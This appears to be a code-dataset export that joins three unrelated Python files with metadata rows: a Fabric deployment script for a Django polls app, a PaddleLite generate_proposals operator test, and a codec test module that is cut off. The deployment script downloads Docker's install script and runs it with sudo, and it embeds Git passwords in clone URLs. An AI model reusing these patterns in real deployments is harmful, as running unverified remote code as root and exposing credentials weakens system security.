    extra **kwargs are forwarded to connection.run (e.g. pty=True)."""
    with connection.cd(project_dir):
        connection.run(f"source venv/bin/activate && {command}", **kwargs)
| 39.492683 | 116 | 0.669837 | from getpass import getpass
from fabric import Config, Connection, task
from invoke import Responder
from invoke import run as run_local
REPOSITORY_URL = "github.com/janbrrr/django-polls-improved.git"
HOSTS = {
"local": {"address": "localhost"},
"prod": {"address": "YOUR-HOST", "project_dir": "~/python/django-polls-improved"},
}
DOCKER_RUN_CMD = "docker-compose up -d --build"
DOCKER_STOP_CMD = "docker-compose down"
DOCKER_STATUS_CMD = "docker-compose ps"
DOCKER_LOGS_CMD = "docker-compose logs"
@task
def setup(context):
host = context.host
if host not in HOSTS or host == "local":
raise RuntimeError("Run 'fab -H <host> setup' where <host> is 'prod'")
remote_user = input("User: ")
remote_password = getpass("Password: ")
config = Config(overrides={"sudo": {"password": remote_password}})
remote_address = HOSTS[host]["address"]
remote_project_dir = HOSTS[host]["project_dir"]
with Connection(
host=remote_address, user=remote_user, connect_kwargs={"password": remote_password}, config=config
) as connection:
git_clone(connection, remote_project_dir)
install_python(connection, remote_password)
install_docker(connection)
create_venv(connection, remote_project_dir)
run_in_venv(connection, remote_project_dir, "pip install wheel")
run_in_venv(connection, remote_project_dir, "pip install docker-compose")
print()
print("Setup complete!")
print("Remember to put your certificate in 'nginx/my_cert.pem' and your key in 'nginx/my_key.pem'")
print("or run 'fab -H prod create-certificate' to create a self-signed certificate")
print("Remember to create the '.env' and 'env.db' files to configure the Django and Postgres.")
@task
def create_certificate(context):
host = context.host
if host not in HOSTS:
raise RuntimeError("Run 'fab -H <host> create-certificate' where <host> is 'local' or 'prod'")
command = "openssl req -x509 -newkey rsa:4096 -keyout nginx/my_key.pem -out nginx/my_cert.pem -days 365 --nodes"
if host == "local":
run_local(command)
else:
remote_user = input("User: ")
remote_password = getpass("Password: ")
remote_address = HOSTS[host]["address"]
remote_project_dir = HOSTS[host]["project_dir"]
with Connection(
host=remote_address, user=remote_user, connect_kwargs={"password": remote_password}
) as connection:
with connection.cd(remote_project_dir):
connection.run(command)
@task
def create_superuser(context):
host = context.host
if host not in HOSTS:
raise RuntimeError("Run 'fab -H <host> create-superuser' where <host> is 'local' or 'prod'")
command = "docker-compose exec web python manage.py createsuperuser"
if host == "local":
run_local(command)
else:
remote_user = input("User: ")
remote_password = getpass("Password: ")
remote_address = HOSTS[host]["address"]
remote_project_dir = HOSTS[host]["project_dir"]
with Connection(
host=remote_address, user=remote_user, connect_kwargs={"password": remote_password}
) as connection:
run_in_venv(connection, remote_project_dir, command, pty=True)
@task
def deploy(context):
host = context.host
if host not in HOSTS:
raise RuntimeError("Run 'fab -H <host> deploy' where <host> is 'local' or 'prod'")
if host == "local":
run_local(DOCKER_RUN_CMD)
else:
remote_user = input("User: ")
remote_password = getpass("Password: ")
remote_address = HOSTS[host]["address"]
remote_project_dir = HOSTS[host]["project_dir"]
with Connection(
host=remote_address, user=remote_user, connect_kwargs={"password": remote_password}
) as connection:
git_pull(connection, remote_project_dir)
run_in_venv(connection, remote_project_dir, DOCKER_RUN_CMD)
@task
def stop(context):
host = context.host
if host not in HOSTS:
raise RuntimeError("Run 'fab -H <host> stop' where <host> is 'local' or 'prod'")
if host == "local":
run_local(DOCKER_STOP_CMD)
else:
remote_user = input("User: ")
remote_password = getpass("Password: ")
remote_address = HOSTS[host]["address"]
remote_project_dir = HOSTS[host]["project_dir"]
with Connection(
host=remote_address, user=remote_user, connect_kwargs={"password": remote_password}
) as connection:
run_in_venv(connection, remote_project_dir, DOCKER_STOP_CMD)
@task
def status(context):
host = context.host
if host not in HOSTS:
raise RuntimeError("Run 'fab -H <host> status' where <host> is 'local' or 'prod'")
if host == "local":
run_local(DOCKER_STATUS_CMD)
else:
remote_user = input("User: ")
remote_password = getpass("Password: ")
remote_address = HOSTS[host]["address"]
remote_project_dir = HOSTS[host]["project_dir"]
with Connection(
host=remote_address, user=remote_user, connect_kwargs={"password": remote_password}
) as connection:
run_in_venv(connection, remote_project_dir, DOCKER_STATUS_CMD)
@task
def logs(context):
host = context.host
if host not in HOSTS:
raise RuntimeError("Run 'fab -H <host> logs' where <host> is 'local' or 'prod'")
if host == "local":
run_local(DOCKER_LOGS_CMD)
else:
remote_user = input("User: ")
remote_password = getpass("Password: ")
remote_address = HOSTS[host]["address"]
remote_project_dir = HOSTS[host]["project_dir"]
with Connection(
host=remote_address, user=remote_user, connect_kwargs={"password": remote_password}
) as connection:
run_in_venv(connection, remote_project_dir, DOCKER_LOGS_CMD)
def install_docker(connection):
connection.run("curl -fsSL https://get.docker.com -o get-docker.sh")
connection.sudo("sh get-docker.sh")
connection.sudo("usermod -a -G docker $USER")
def install_python(connection, sudo_password):
connection.sudo("apt-get update -qy")
connection.sudo(
"apt-get install -qy build-essential tk-dev libncurses5-dev libncursesw5-dev libreadline6-dev libdb5.3-dev "
"libgdbm-dev libsqlite3-dev libssl-dev libbz2-dev libexpat1-dev liblzma-dev zlib1g-dev libffi-dev"
)
connection.run("wget https://www.python.org/ftp/python/3.7.3/Python-3.7.3.tar.xz")
connection.run("tar xf Python-3.7.3.tar.xz")
with connection.cd("Python-3.7.3"):
connection.run("./configure")
connection.run("make")
sudo_responder = Responder(pattern=r"\[sudo\] password", response=f"{sudo_password}\n")
connection.run("sudo make altinstall", pty=True, watchers=[sudo_responder])
connection.sudo("rm -r Python-3.7.3")
connection.sudo("rm Python-3.7.3.tar.xz")
def git_clone(connection, project_dir):
git_username = input("Git username: ")
git_password = getpass("Git password: ")
connection.run(f"git clone https://{git_username}:{git_password}@{REPOSITORY_URL} {project_dir}")
def git_pull(connection, project_dir):
with connection.cd(project_dir):
git_username = input("Git username: ")
git_password = getpass("Git password: ")
connection.run(f"git pull https://{git_username}:{git_password}@{REPOSITORY_URL} master")
def create_venv(connection, project_dir):
with connection.cd(project_dir):
connection.run("python3.7 -m venv venv")
def run_in_venv(connection, project_dir, command, **kwargs):
with connection.cd(project_dir):
connection.run(f"source venv/bin/activate && {command}", **kwargs)
| true | true |
f7fa30565c238f3f862a6dc7fda40b74bae15450 | 4,936 | py | Python | lite/tests/unittest_py/op/test_generate_proposals_op.py | liyupeng/Paddle-Lite | e821d4d6f62f71534f594afc74560738bf02a879 | [
"Apache-2.0"
] | null | null | null | lite/tests/unittest_py/op/test_generate_proposals_op.py | liyupeng/Paddle-Lite | e821d4d6f62f71534f594afc74560738bf02a879 | [
"Apache-2.0"
] | null | null | null | lite/tests/unittest_py/op/test_generate_proposals_op.py | liyupeng/Paddle-Lite | e821d4d6f62f71534f594afc74560738bf02a879 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
sys.path.append('../')
from auto_scan_test import AutoScanTest, IgnoreReasons
from program_config import TensorConfig, ProgramConfig, OpConfig, CxxConfig, TargetType, PrecisionType, DataLayoutType, Place
import unittest
import hypothesis
from hypothesis import given, settings, seed, example, assume
import numpy as np
from functools import partial
import hypothesis.strategies as st
class TestGenerateProposalsOp(AutoScanTest):
    """Auto-scan test for the `generate_proposals` op, fed by an
    `anchor_generator` op, on the Host/FP32/NCHW place."""
    def __init__(self, *args, **kwargs):
        AutoScanTest.__init__(self, *args, **kwargs)
        self.enable_testing_on_place(TargetType.Host, PrecisionType.FP32, DataLayoutType.NCHW, thread=[1, 4])
    def is_program_valid(self, program_config: ProgramConfig , predictor_config: CxxConfig) -> bool:
        # All sampled programs are valid for this op.
        return True
    def sample_program_configs(self, draw):
        # NCHW feature-map shape; batch size is fixed to 1.
        in_shape = draw(st.lists(st.integers(min_value=16, max_value=32), min_size=4, max_size=4))
        in_shape[0] = 1
        anchor_sizes = draw(st.sampled_from([[32.0], [32.0, 64.0], [64.0, 128.0], [32.0, 64.0, 128.0]]))
        aspect_ratios = draw(st.sampled_from([[1.0], [1.0, 2.0], [0.5, 1.0, 2.0]]))
        variances = draw(st.lists(st.floats(min_value=0.5, max_value=1.5), min_size=4, max_size=4))
        stride = draw(st.sampled_from([[16.0, 16.0], [24.0, 24.0], [16.0, 24.0]]))
        num_anchors = len(anchor_sizes) * len(aspect_ratios)
        # anchor_generator produces the Anchors/Variances tensors consumed by
        # generate_proposals below.
        anchor_generator_op = OpConfig(
            type = "anchor_generator",
            inputs = {"Input" : ["input_data"]},
            outputs = {"Anchors": ["anchors_data"],
                    "Variances": ["variance_data"]},
            attrs = {"anchor_sizes": anchor_sizes,
                    "aspect_ratios": aspect_ratios,
                    "stride": stride,
                    "variances": variances,
                    "offset": 0.5
                })
        scale = draw(st.floats(min_value=1, max_value=1))
        # Scores: one channel per anchor; BboxDeltas: 4 coords per anchor.
        scores_shape = [in_shape[0], num_anchors, in_shape[2], in_shape[3]]
        bbox_delta_shape = [scores_shape[0], scores_shape[1] * 4, scores_shape[2], scores_shape[3]]
        pre_nms_topN = draw(st.integers(min_value=2000, max_value=8000))
        post_nms_topN = draw(st.integers(min_value=1000, max_value=1500))
        nms_thresh = draw(st.floats(min_value=0.5, max_value=0.8))
        min_size = draw(st.floats(min_value=2, max_value=4))
        eta = draw(st.floats(min_value=0.5, max_value=1.5))
        def generate_im_info(*args, **kwargs):
            # [image height, image width, scale] derived from the feature map
            # size and stride.
            return np.array([in_shape[2] * stride[0], in_shape[3] * stride[1], scale]).astype(np.float32)
        generate_proposals_op = OpConfig(
            type = "generate_proposals",
            inputs = {
                "Scores" : ["scores_data"],
                "BboxDeltas" : ["bbox_delta_data"],
                "ImInfo" : ["im_info_data"],
                "Anchors" : ["anchors_data"],
                "Variances" : ["variance_data"]
            },
            outputs = {
                "RpnRois": ["rpn_rois_data"],
                "RpnRoiProbs" : ["rpn_rois_probs_data"],
                "RpnRoisNum" : ["rpn_rois_num_data"]
            },
            attrs = {
                "pre_nms_topN" : pre_nms_topN,
                "post_nms_topN" : post_nms_topN,
                "nms_thresh" : nms_thresh,
                "min_size" : min_size,
                "eta" : eta
            })
        program_config = ProgramConfig(
            ops=[anchor_generator_op, generate_proposals_op],
            weights={},
            inputs={
                "input_data":
                TensorConfig(shape=in_shape),
                "scores_data":
                TensorConfig(shape=scores_shape),
                "bbox_delta_data":
                TensorConfig(shape=bbox_delta_shape),
                "im_info_data":
                TensorConfig(data_gen=partial(generate_im_info))
            },
            outputs=["rpn_rois_data", "rpn_rois_probs_data", "rpn_rois_num_data"])
        return program_config
    def sample_predictor_configs(self):
        # NOTE(review): the reported op list names "anchor_generator" although
        # the op under test is generate_proposals — confirm this is intended.
        return self.get_predictor_configs(), ["anchor_generator"], (1e-5, 1e-5)
    def add_ignore_pass_case(self):
        pass
    def test(self, *args, **kwargs):
        self.run_and_statis(quant=False, max_examples=25)
if __name__ == "__main__":
unittest.main(argv=[''])
| 41.133333 | 125 | 0.60859 |
import sys
sys.path.append('../')
from auto_scan_test import AutoScanTest, IgnoreReasons
from program_config import TensorConfig, ProgramConfig, OpConfig, CxxConfig, TargetType, PrecisionType, DataLayoutType, Place
import unittest
import hypothesis
from hypothesis import given, settings, seed, example, assume
import numpy as np
from functools import partial
import hypothesis.strategies as st
class TestGenerateProposalsOp(AutoScanTest):
def __init__(self, *args, **kwargs):
AutoScanTest.__init__(self, *args, **kwargs)
self.enable_testing_on_place(TargetType.Host, PrecisionType.FP32, DataLayoutType.NCHW, thread=[1, 4])
def is_program_valid(self, program_config: ProgramConfig , predictor_config: CxxConfig) -> bool:
return True
def sample_program_configs(self, draw):
in_shape = draw(st.lists(st.integers(min_value=16, max_value=32), min_size=4, max_size=4))
in_shape[0] = 1
anchor_sizes = draw(st.sampled_from([[32.0], [32.0, 64.0], [64.0, 128.0], [32.0, 64.0, 128.0]]))
aspect_ratios = draw(st.sampled_from([[1.0], [1.0, 2.0], [0.5, 1.0, 2.0]]))
variances = draw(st.lists(st.floats(min_value=0.5, max_value=1.5), min_size=4, max_size=4))
stride = draw(st.sampled_from([[16.0, 16.0], [24.0, 24.0], [16.0, 24.0]]))
num_anchors = len(anchor_sizes) * len(aspect_ratios)
anchor_generator_op = OpConfig(
type = "anchor_generator",
inputs = {"Input" : ["input_data"]},
outputs = {"Anchors": ["anchors_data"],
"Variances": ["variance_data"]},
attrs = {"anchor_sizes": anchor_sizes,
"aspect_ratios": aspect_ratios,
"stride": stride,
"variances": variances,
"offset": 0.5
})
scale = draw(st.floats(min_value=1, max_value=1))
scores_shape = [in_shape[0], num_anchors, in_shape[2], in_shape[3]]
bbox_delta_shape = [scores_shape[0], scores_shape[1] * 4, scores_shape[2], scores_shape[3]]
pre_nms_topN = draw(st.integers(min_value=2000, max_value=8000))
post_nms_topN = draw(st.integers(min_value=1000, max_value=1500))
nms_thresh = draw(st.floats(min_value=0.5, max_value=0.8))
min_size = draw(st.floats(min_value=2, max_value=4))
eta = draw(st.floats(min_value=0.5, max_value=1.5))
def generate_im_info(*args, **kwargs):
return np.array([in_shape[2] * stride[0], in_shape[3] * stride[1], scale]).astype(np.float32)
generate_proposals_op = OpConfig(
type = "generate_proposals",
inputs = {
"Scores" : ["scores_data"],
"BboxDeltas" : ["bbox_delta_data"],
"ImInfo" : ["im_info_data"],
"Anchors" : ["anchors_data"],
"Variances" : ["variance_data"]
},
outputs = {
"RpnRois": ["rpn_rois_data"],
"RpnRoiProbs" : ["rpn_rois_probs_data"],
"RpnRoisNum" : ["rpn_rois_num_data"]
},
attrs = {
"pre_nms_topN" : pre_nms_topN,
"post_nms_topN" : post_nms_topN,
"nms_thresh" : nms_thresh,
"min_size" : min_size,
"eta" : eta
})
program_config = ProgramConfig(
ops=[anchor_generator_op, generate_proposals_op],
weights={},
inputs={
"input_data":
TensorConfig(shape=in_shape),
"scores_data":
TensorConfig(shape=scores_shape),
"bbox_delta_data":
TensorConfig(shape=bbox_delta_shape),
"im_info_data":
TensorConfig(data_gen=partial(generate_im_info))
},
outputs=["rpn_rois_data", "rpn_rois_probs_data", "rpn_rois_num_data"])
return program_config
def sample_predictor_configs(self):
return self.get_predictor_configs(), ["anchor_generator"], (1e-5, 1e-5)
def add_ignore_pass_case(self):
pass
    def test(self, *args, **kwargs):
        # Run the hypothesis-driven comparison; quantization is not exercised,
        # and example count is capped to keep runtime bounded.
        self.run_and_statis(quant=False, max_examples=25)
if __name__ == "__main__":
    # Empty argv so unittest does not try to parse the outer runner's arguments.
    unittest.main(argv=[''])
| true | true |
f7fa305b79b7894b34e4865ca9355c4a05bbc097 | 113,086 | py | Python | Lib/yp_test/test_codecs.py | Syeberman/nohtyP | 59d7214a5a5474a03c54f45d79ad4fd037989a79 | [
"CNRI-Python-GPL-Compatible"
] | null | null | null | Lib/yp_test/test_codecs.py | Syeberman/nohtyP | 59d7214a5a5474a03c54f45d79ad4fd037989a79 | [
"CNRI-Python-GPL-Compatible"
] | null | null | null | Lib/yp_test/test_codecs.py | Syeberman/nohtyP | 59d7214a5a5474a03c54f45d79ad4fd037989a79 | [
"CNRI-Python-GPL-Compatible"
] | null | null | null | from yp import *
import codecs
import contextlib
import io
import locale
import sys
from yp_test import yp_unittest
import warnings
import encodings
from yp_test import support
# Extra assurance that we're not accidentally testing Python's types...unless we mean to
# Keep a handle on the real built-in before shadowing it below.
_str = str

def bytes(*_args, **_kwargs):
    # Guard: shadow the builtin so un-converted code fails loudly.
    raise NotImplementedError("convert script to yp_bytes here")

def bytearray(*_args, **_kwargs):
    # Guard: shadow the builtin so un-converted code fails loudly.
    raise NotImplementedError("convert script to yp_bytearray here")

def str(*_args, **_kwargs):
    # Guard: shadow the builtin so un-converted code fails loudly.
    raise NotImplementedError("convert script to yp_str here")
if sys.platform == 'win32':
    # Windows Vista is NT 6.0; the cp65001 codec behaves differently before it.
    VISTA_OR_LATER = (sys.getwindowsversion().major >= 6)
else:
    VISTA_OR_LATER = False
try:
    import ctypes
except ImportError:
    # ctypes unavailable: wchar_t size cannot be determined.
    ctypes = None
    SIZEOF_WCHAR_T = -1
else:
    SIZEOF_WCHAR_T = ctypes.sizeof(ctypes.c_wchar)
def coding_checker(self, coder):
    """Return a helper asserting that *coder* consumes its whole input.

    The returned callable ``check(data, expect)`` asserts that
    ``coder(data) == (expect, len(data))`` using *self*'s assertEqual.
    """
    # 'data' rather than 'input': avoid shadowing the builtin; all callers
    # in this file invoke the returned closure positionally.
    def check(data, expect):
        self.assertEqual(coder(data), (expect, len(data)))
    return check
class Queue(object):
    """A FIFO byte queue: bytes written at one end are read from the other."""

    def __init__(self, buffer):
        self._buffer = buffer

    def write(self, chars):
        # Append new data at the tail.
        self._buffer += chars

    def read(self, size=-1):
        # A negative size drains the entire queue.
        if size < 0:
            drained = self._buffer
            self._buffer = self._buffer[:0]  # empty, but same buffer type
            return drained
        head, self._buffer = self._buffer[:size], self._buffer[size:]
        return head
class MixInCheckStateHandling:
    """Mixin verifying that incremental codecs round-trip their state.

    The host class must provide the unittest assertion methods.
    """

    def check_state_handling_decode(self, encoding, u, s):
        # Split the byte string at every position and make sure a decoder
        # restored from getstate() finishes the job identically.
        for split in range(len(s) + 1):
            decoder = codecs.getincrementaldecoder(encoding)()
            head = decoder.decode(s[:split])
            state = decoder.getstate()
            self.assertIsInstance(state[1], int)
            # Documented invariant of IncrementalDecoder.getstate(): with a
            # zero flag, re-feeding the buffered bytes must produce no output
            # and leave the decoder in exactly the same state.
            if not state[1]:
                decoder.setstate((state[0][:0], 0))
                self.assertTrue(not decoder.decode(state[0]))
                self.assertEqual(state, decoder.getstate())
            restored = codecs.getincrementaldecoder(encoding)()
            restored.setstate(state)
            tail = restored.decode(s[split:], True)
            self.assertEqual(u, head + tail)

    def check_state_handling_encode(self, encoding, u, s):
        # Same idea for encoders: state captured mid-stream must be
        # restorable into a fresh encoder.
        for split in range(len(u) + 1):
            encoder = codecs.getincrementalencoder(encoding)()
            head = encoder.encode(u[:split])
            state = encoder.getstate()
            restored = codecs.getincrementalencoder(encoding)()
            restored.setstate(state)
            tail = restored.encode(u[split:], True)
            self.assertEqual(s, head + tail)
@yp_unittest.skip_str_codecs
class ReadTest(MixInCheckStateHandling):
    """Shared tests for byte-by-byte stream reading and incremental decoding.

    Concrete subclasses set ``encoding`` (and ``ill_formed_sequence`` for the
    lone-surrogate tests) and inherit these generic checks.
    """

    def check_partial(self, input, partialresults):
        # get a StreamReader for the encoding and feed the bytestring version
        # of input to the reader byte by byte. Read everything available from
        # the StreamReader and check that the results equal the appropriate
        # entries from partialresults.
        q = Queue(b"")
        r = codecs.getreader(self.encoding)(q)
        result = ""
        for (c, partialresult) in zip(input.encode(self.encoding), partialresults):
            q.write(bytes([c]))
            result += r.read()
            self.assertEqual(result, partialresult)
        # check that there's nothing left in the buffers
        self.assertEqual(r.read(), "")
        self.assertEqual(r.bytebuffer, b"")

        # do the check again, this time using a incremental decoder
        d = codecs.getincrementaldecoder(self.encoding)()
        result = ""
        for (c, partialresult) in zip(input.encode(self.encoding), partialresults):
            result += d.decode(bytes([c]))
            self.assertEqual(result, partialresult)
        # check that there's nothing left in the buffers
        self.assertEqual(d.decode(b"", True), "")
        self.assertEqual(d.buffer, b"")

        # Check whether the reset method works properly
        d.reset()
        result = ""
        for (c, partialresult) in zip(input.encode(self.encoding), partialresults):
            result += d.decode(bytes([c]))
            self.assertEqual(result, partialresult)
        # check that there's nothing left in the buffers
        self.assertEqual(d.decode(b"", True), "")
        self.assertEqual(d.buffer, b"")

        # check iterdecode()
        encoded = input.encode(self.encoding)
        self.assertEqual(
            input,
            "".join(codecs.iterdecode([bytes([c]) for c in encoded], self.encoding))
        )

    def test_readline(self):
        def getreader(input):
            stream = io.BytesIO(input.encode(self.encoding))
            return codecs.getreader(self.encoding)(stream)

        def readalllines(input, keepends=True, size=None):
            reader = getreader(input)
            lines = []
            while True:
                line = reader.readline(size=size, keepends=keepends)
                if not line:
                    break
                lines.append(line)
            return "|".join(lines)

        s = "foo\nbar\r\nbaz\rspam\u2028eggs"
        sexpected = "foo\n|bar\r\n|baz\r|spam\u2028|eggs"
        sexpectednoends = "foo|bar|baz|spam|eggs"
        self.assertEqual(readalllines(s, True), sexpected)
        self.assertEqual(readalllines(s, False), sexpectednoends)
        self.assertEqual(readalllines(s, True, 10), sexpected)
        self.assertEqual(readalllines(s, False, 10), sexpectednoends)

        lineends = ("\n", "\r\n", "\r", "\u2028")
        # Test long lines (multiple calls to read() in readline())
        vw = []
        vwo = []
        for (i, lineend) in enumerate(lineends):
            vw.append((i*200+200)*"\u3042" + lineend)
            vwo.append((i*200+200)*"\u3042")
        self.assertEqual(readalllines("".join(vw), True), "|".join(vw))
        self.assertEqual(readalllines("".join(vw), False), "|".join(vwo))

        # Test lines where the first read might end with \r, so the
        # reader has to look ahead whether this is a lone \r or a \r\n
        for size in range(80):
            for lineend in lineends:
                s = 10*(size*"a" + lineend + "xxx\n")
                reader = getreader(s)
                for i in range(10):
                    self.assertEqual(
                        reader.readline(keepends=True),
                        size*"a" + lineend,
                    )
                self.assertEqual(
                    reader.readline(keepends=True),
                    "xxx\n",
                )
                reader = getreader(s)
                for i in range(10):
                    self.assertEqual(
                        reader.readline(keepends=False),
                        size*"a",
                    )
                self.assertEqual(
                    reader.readline(keepends=False),
                    "xxx",
                )

    def test_mixed_readline_and_read(self):
        lines = ["Humpty Dumpty sat on a wall,\n",
                 "Humpty Dumpty had a great fall.\r\n",
                 "All the king's horses and all the king's men\r",
                 "Couldn't put Humpty together again."]
        data = ''.join(lines)
        def getreader():
            stream = io.BytesIO(data.encode(self.encoding))
            return codecs.getreader(self.encoding)(stream)

        # Issue #8260: Test readline() followed by read()
        f = getreader()
        self.assertEqual(f.readline(), lines[0])
        self.assertEqual(f.read(), ''.join(lines[1:]))
        self.assertEqual(f.read(), '')

        # Issue #16636: Test readline() followed by readlines()
        f = getreader()
        self.assertEqual(f.readline(), lines[0])
        self.assertEqual(f.readlines(), lines[1:])
        self.assertEqual(f.read(), '')

        # Test read() followed by read()
        f = getreader()
        self.assertEqual(f.read(size=40, chars=5), data[:5])
        self.assertEqual(f.read(), data[5:])
        self.assertEqual(f.read(), '')

        # Issue #12446: Test read() followed by readlines()
        f = getreader()
        self.assertEqual(f.read(size=40, chars=5), data[:5])
        self.assertEqual(f.readlines(), [lines[0][5:]] + lines[1:])
        self.assertEqual(f.read(), '')

    def test_bug1175396(self):
        # Regression: iterating a StreamReader over a large mixed-lineend
        # document must yield exactly the original lines.
        s = [
            '<%!--===================================================\r\n',
            '    BLOG index page: show recent articles,\r\n',
            '    today\'s articles, or articles of a specific date.\r\n',
            '========================================================--%>\r\n',
            '<%@inputencoding="ISO-8859-1"%>\r\n',
            '<%@pagetemplate=TEMPLATE.y%>\r\n',
            '<%@import=import frog.util, frog%>\r\n',
            '<%@import=import frog.objects%>\r\n',
            '<%@import=from frog.storageerrors import StorageError%>\r\n',
            '<%\r\n',
            '\r\n',
            'import logging\r\n',
            'log=logging.getLogger("Snakelets.logger")\r\n',
            '\r\n',
            '\r\n',
            'user=self.SessionCtx.user\r\n',
            'storageEngine=self.SessionCtx.storageEngine\r\n',
            '\r\n',
            '\r\n',
            'def readArticlesFromDate(date, count=None):\r\n',
            '    entryids=storageEngine.listBlogEntries(date)\r\n',
            '    entryids.reverse() # descending\r\n',
            '    if count:\r\n',
            '        entryids=entryids[:count]\r\n',
            '    try:\r\n',
            '        return [ frog.objects.BlogEntry.load(storageEngine, date, Id) for Id in entryids ]\r\n',
            '    except StorageError,x:\r\n',
            '        log.error("Error loading articles: "+str(x))\r\n',
            '        self.abort("cannot load articles")\r\n',
            '\r\n',
            'showdate=None\r\n',
            '\r\n',
            'arg=self.Request.getArg()\r\n',
            'if arg=="today":\r\n',
            '    #-------------------- TODAY\'S ARTICLES\r\n',
            '    self.write("<h2>Today\'s articles</h2>")\r\n',
            '    showdate = frog.util.isodatestr() \r\n',
            '    entries = readArticlesFromDate(showdate)\r\n',
            'elif arg=="active":\r\n',
            '    #-------------------- ACTIVE ARTICLES redirect\r\n',
            '    self.Yredirect("active.y")\r\n',
            'elif arg=="login":\r\n',
            '    #-------------------- LOGIN PAGE redirect\r\n',
            '    self.Yredirect("login.y")\r\n',
            'elif arg=="date":\r\n',
            '    #-------------------- ARTICLES OF A SPECIFIC DATE\r\n',
            '    showdate = self.Request.getParameter("date")\r\n',
            '    self.write("<h2>Articles written on %s</h2>"% frog.util.mediumdatestr(showdate))\r\n',
            '    entries = readArticlesFromDate(showdate)\r\n',
            'else:\r\n',
            '    #-------------------- RECENT ARTICLES\r\n',
            '    self.write("<h2>Recent articles</h2>")\r\n',
            '    dates=storageEngine.listBlogEntryDates()\r\n',
            '    if dates:\r\n',
            '        entries=[]\r\n',
            '        SHOWAMOUNT=10\r\n',
            '        for showdate in dates:\r\n',
            '            entries.extend( readArticlesFromDate(showdate, SHOWAMOUNT-len(entries)) )\r\n',
            '            if len(entries)>=SHOWAMOUNT:\r\n',
            '                break\r\n',
            '                \r\n',
        ]
        stream = io.BytesIO("".join(s).encode(self.encoding))
        reader = codecs.getreader(self.encoding)(stream)
        for (i, line) in enumerate(reader):
            self.assertEqual(line, s[i])

    def test_readlinequeue(self):
        q = Queue(b"")
        writer = codecs.getwriter(self.encoding)(q)
        reader = codecs.getreader(self.encoding)(q)

        # No lineends
        writer.write("foo\r")
        self.assertEqual(reader.readline(keepends=False), "foo")
        writer.write("\nbar\r")
        self.assertEqual(reader.readline(keepends=False), "")
        self.assertEqual(reader.readline(keepends=False), "bar")
        writer.write("baz")
        self.assertEqual(reader.readline(keepends=False), "baz")
        self.assertEqual(reader.readline(keepends=False), "")

        # Lineends
        writer.write("foo\r")
        self.assertEqual(reader.readline(keepends=True), "foo\r")
        writer.write("\nbar\r")
        self.assertEqual(reader.readline(keepends=True), "\n")
        self.assertEqual(reader.readline(keepends=True), "bar\r")
        writer.write("baz")
        self.assertEqual(reader.readline(keepends=True), "baz")
        self.assertEqual(reader.readline(keepends=True), "")
        writer.write("foo\r\n")
        self.assertEqual(reader.readline(keepends=True), "foo\r\n")

    def test_bug1098990_a(self):
        # readline() across a read-chunk boundary in a long line.
        s1 = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy\r\n"
        s2 = "offending line: ladfj askldfj klasdj fskla dfzaskdj fasklfj laskd fjasklfzzzzaa%whereisthis!!!\r\n"
        s3 = "next line.\r\n"

        s = (s1+s2+s3).encode(self.encoding)
        stream = io.BytesIO(s)
        reader = codecs.getreader(self.encoding)(stream)
        self.assertEqual(reader.readline(), s1)
        self.assertEqual(reader.readline(), s2)
        self.assertEqual(reader.readline(), s3)
        self.assertEqual(reader.readline(), "")

    def test_bug1098990_b(self):
        s1 = "aaaaaaaaaaaaaaaaaaaaaaaa\r\n"
        s2 = "bbbbbbbbbbbbbbbbbbbbbbbb\r\n"
        s3 = "stillokay:bbbbxx\r\n"
        s4 = "broken!!!!badbad\r\n"
        s5 = "againokay.\r\n"

        s = (s1+s2+s3+s4+s5).encode(self.encoding)
        stream = io.BytesIO(s)
        reader = codecs.getreader(self.encoding)(stream)
        self.assertEqual(reader.readline(), s1)
        self.assertEqual(reader.readline(), s2)
        self.assertEqual(reader.readline(), s3)
        self.assertEqual(reader.readline(), s4)
        self.assertEqual(reader.readline(), s5)
        self.assertEqual(reader.readline(), "")

    # What "replace" produces for one ill-formed sequence when decoding.
    ill_formed_sequence_replace = "\ufffd"

    def test_lone_surrogates(self):
        self.assertRaises(UnicodeEncodeError, "\ud800".encode, self.encoding)
        self.assertEqual("[\uDC80]".encode(self.encoding, "backslashreplace"),
                         "[\\udc80]".encode(self.encoding))
        self.assertEqual("[\uDC80]".encode(self.encoding, "xmlcharrefreplace"),
                         "[&#56448;]".encode(self.encoding))
        self.assertEqual("[\uDC80]".encode(self.encoding, "ignore"),
                         "[]".encode(self.encoding))
        self.assertEqual("[\uDC80]".encode(self.encoding, "replace"),
                         "[?]".encode(self.encoding))

        bom = "".encode(self.encoding)
        for before, after in [("\U00010fff", "A"), ("[", "]"),
                              ("A", "\U00010fff")]:
            before_sequence = before.encode(self.encoding)[len(bom):]
            after_sequence = after.encode(self.encoding)[len(bom):]
            test_string = before + "\uDC80" + after
            test_sequence = (bom + before_sequence +
                             self.ill_formed_sequence + after_sequence)
            self.assertRaises(UnicodeDecodeError, test_sequence.decode,
                              self.encoding)
            self.assertEqual(test_string.encode(self.encoding,
                                                "surrogatepass"),
                             test_sequence)
            self.assertEqual(test_sequence.decode(self.encoding,
                                                  "surrogatepass"),
                             test_string)
            self.assertEqual(test_sequence.decode(self.encoding, "ignore"),
                             before + after)
            self.assertEqual(test_sequence.decode(self.encoding, "replace"),
                             before + self.ill_formed_sequence_replace + after)
@yp_unittest.skip_str_codecs
class UTF32Test(ReadTest, yp_unittest.TestCase):
    """UTF-32 codec (BOM auto-detecting variant)."""
    encoding = "utf-32"
    # Native-endian encoding of the lone surrogate U+DC80.
    if sys.byteorder == 'little':
        ill_formed_sequence = b"\x80\xdc\x00\x00"
    else:
        ill_formed_sequence = b"\x00\x00\xdc\x80"

    spamle = (b'\xff\xfe\x00\x00'
              b's\x00\x00\x00p\x00\x00\x00a\x00\x00\x00m\x00\x00\x00'
              b's\x00\x00\x00p\x00\x00\x00a\x00\x00\x00m\x00\x00\x00')
    spambe = (b'\x00\x00\xfe\xff'
